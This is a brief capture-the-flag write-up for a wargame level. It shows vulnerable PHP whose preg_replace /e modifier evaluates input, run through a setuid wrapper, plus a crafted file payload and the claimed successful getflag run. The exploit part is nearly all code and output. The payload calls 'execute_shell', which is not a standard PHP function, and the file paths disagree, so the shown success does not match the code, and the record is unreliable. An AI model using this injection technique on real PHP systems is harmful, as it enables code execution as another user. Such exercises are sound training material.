There’s a C setuid wrapper for some vulnerable PHP code…

<?php

function spam($email)
{
  $email = preg_replace("/\./", " dot ", $email);
  $email = preg_replace("/@/", " AT ", $email);
  
  return $email;
}

function markup($filename, $use_me)
{
  $contents = file_get_contents($filename);

  $contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
  $contents = preg_replace("/\[/", "<", $contents);
  $contents = preg_replace("/\]/", ">", $contents);

  return $contents;
}

$output = markup($argv[1], $argv[2]);

print $output;

?>


> cat /home/leve09/file
[email {${execute_shell($use_me)}}]

> /home/flag09/flag09 /home/level09/file "getflag"
You have successfully executed getflag on a target account.
